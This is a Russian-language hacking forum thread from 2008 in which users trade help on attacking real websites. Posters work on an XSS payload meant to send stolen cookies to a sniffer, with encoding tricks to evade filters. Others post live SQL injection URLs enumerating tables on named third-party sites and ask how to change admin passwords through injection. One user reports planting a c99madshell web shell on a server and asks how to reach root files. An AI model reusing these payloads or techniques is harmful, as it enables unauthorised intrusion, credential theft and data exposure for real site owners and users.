Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    krypt3r
    Чем это ты кодируешь?
    ----------------------------------
    не работает :(
     
  2. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Все, что внутри String.fromCharCode() - это коды символов в гексальной системе.
    Алерт-то хоть выскакивает? =) Попробуй потренироваться на замене имеющейся картинке страницы типа
    Code:
    document.images(0).src = <путь к какой-нить картинке>;
    
    Если картинка поменялась, пробуй в src вставить код сниффера
     
  3. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    конечно )))
    И мои куки показывает, если попросить их через запрос вида
    Но на снифер не отправляет.
    Сайт на котором пытаюсь провернуть (PHP-Fusion 6.01.13)
    может в нем загвоздка?-так ведь алерт есть
     
  4. none222

    none222 Guest

    Reputations:
    0
    А может в том, что ковычки фильтруются или пробелы? пробуй так:
    віжу у тя
    значь тока под ИЕ сойдёт, если другие кавычки не употреблять.
    НО теж говорили зачарить смволы:
    вместо пробелов /**/, на случай если они фильтруются

    или попробуй маниуляции с document.write(String.fromCharCode(ТУТ+ЗАЧАРИННЫЙ ВЕСЬ СКРИПТ))
     
    #1424 none222, 28 Mar 2008
    Last edited by a moderator: 29 Mar 2008
    1 person likes this.
  5. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Ковычки и правда фильтруются, запрос работает только такого вида:
    почему же только в ИЕ?-у меня на опере показывает
    пробелы пробовал заменять еще вчера-ничего не вышло
    --------------------------------------------------------------------
    уже все(из посоветованого), перепробовал и ничего не работает. Могу только увидеть свои куки, но любые попытки отправить их на снифер, заканчиваются обломом :(
    За ответы, всем ОГРОМНОЕ спасибо, но они ни к чему так и не привели.
    --------------------------------------------------------------------
     
    #1425 samarin, 28 Mar 2008
    Last edited: 28 Mar 2008
  6. none222

    none222 Guest

    Reputations:
    0
    я о том что javascript:alert(`xss`) сработет в ІЕ, да и то не во всех версиях. Тут можно обойтись без кавычек, а выще, стукни мне в асю - 8-0-8-8-0-3-6 - помогу
     
    1 person likes this.
  7. Spaise

    Spaise Elder - Старейшина

    Joined:
    21 Mar 2008
    Messages:
    33
    Likes Received:
    5
    Reputations:
    0
    Здравствуйте, скажите пожалуйста, как в Sql инжекции выполнить Update запрос к базе?
     
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 Spaise
    Примерно так:
    update таблица set password='пароль или хеш' where login='логин юзера'

    Надеюсь понятно , что password и login это условно. Нужны твои столбцы
     
    #1428 Kakoytoxaker, 29 Mar 2008
    Last edited: 29 Mar 2008
  9. Spaise

    Spaise Elder - Старейшина

    Joined:
    21 Mar 2008
    Messages:
    33
    Likes Received:
    5
    Reputations:
    0
    Такой запрос катит из PhpMyAdmin, в скуле нужно количество столбцов указывать, вот здесь и облом, ни чего обновить не получается.
     
  10. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    нет. в мускуле в скл-иньекции нельзя при основном запросе если он изначально идет не update произвести апдейт ) то есть тут нельзя разделить запрос на подобие мсскл id=1;update blabla set blabla='xek' where blabla
     
    2 people like this.
  11. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Я не понял вопрос по какой базе? Мой пример для MySQL конечно не катит
     
  12. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Вопросик возник.. е.
    возможно ли через скуль багу, методом insert into
    сменить пароль админа из другой базы.?
    Зависит ли ето только от прав пользователя?
     
  13. Spaise

    Spaise Elder - Старейшина

    Joined:
    21 Mar 2008
    Messages:
    33
    Likes Received:
    5
    Reputations:
    0
    insert into - это добавление, а сменить это апдейт.
    Мой вопрос был по MySQL и он катит, но как blackybr сказал, только не в инжекте.
     
  14. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    на одном сайте в исходниках страницы есть такая сторочка
    if(eregi("[^a-z0-9_-]",$_GET['f']) || eregi("[^a-z0-9_-]",$_GET['p'])){header ("Location: index.php?error&".SID); exit;}
    могу ли я использовать для записишела в php не силен сам предполагаю что нельзя хот яи не уверен
     
  15. d_x

    d_x Banned

    Joined:
    25 Mar 2008
    Messages:
    558
    Likes Received:
    650
    Reputations:
    210
    Никак нельзя, этот код просто проверяет по регулярным выражениям значения входящих переменных и в случае несоответствия шаблону выдаёт редирект, видимо, на страницу с ошибкой.
     
  16. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,080
    Likes Received:
    456
    Reputations:
    38
    нашел название таблицы. а при подставновкке выдаёт ошибку.
    нашел вот так http://www.suas.ru/news/show.php?id=-1+union+select+1,table_name,3,4,5,table_schema,7,8,9,10+from+information_schema.tables+limit+41,1/*

    подставил сюда http://www.suas.ru/news/show.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+ru_suas_reg_users/* и ошибка =\
     
  17. d_x

    d_x Banned

    Joined:
    25 Mar 2008
    Messages:
    558
    Likes Received:
    650
    Reputations:
    210
    В этой таблице нет ни одной записи просто, пустая она:

    http://www.suas.ru/news/show.php?id=-1+union+select+1,2,3,4,5,count(1),7,8,9,10%20from%20ru_suas_reg_users/*
     
    2 people like this.
  18. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Советую в дальнейшем не заниматься телепатией, а посмотреть на происходящие вещи, т.е. сначала посмотреть ссылки которые дали, а потом постить
     
    1 person likes this.
  19. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.laptopshowcase.co.uk/suppliers.php?id=-2+group+by+6+union+select+1,2,3,4,5,6,7,8,9+from+suppliers или products/*

    Чёт у мя тут не получается)).В таблицах Suppliers, Downloads, Products есть столбцы name и id. Вбиваю их,пишет Suppliers not found. Значит ли это, что их нету ?)). Другие столбцы перебирать не стал)

    http://www.laptopshowcase.co.uk/suppliers.php?id=-2+group+by+6+union+select+1,2,3,4,5,6,7,8,9/*

    P.S. Подставляя вместо 3 что-либо, пытаться угадать ? Если есть что...
     
  20. fervex

    fervex New Member

    Joined:
    12 Nov 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Linux exploit

    Здравствуйте! :)

    я ламер, но получилось залить шелл c99madshell на сервер под Software: Apache/2.0.55 (Ubuntu) mod_ssl/2.0.55 OpenSSL/0.9.8a. PHP/5.1.2 Linux webserver2 2.6.15-26-server

    Нет доступа к файлам, у которых Owner root/adm
    Есть доступ к root/root и root/www-data


    Скажите, как получить к root/adm файлам доступ?

    Посоветуйте, где что почитать нужно по этой теме?

    Спасибо!
     
Thread Status:
Not open for further replies.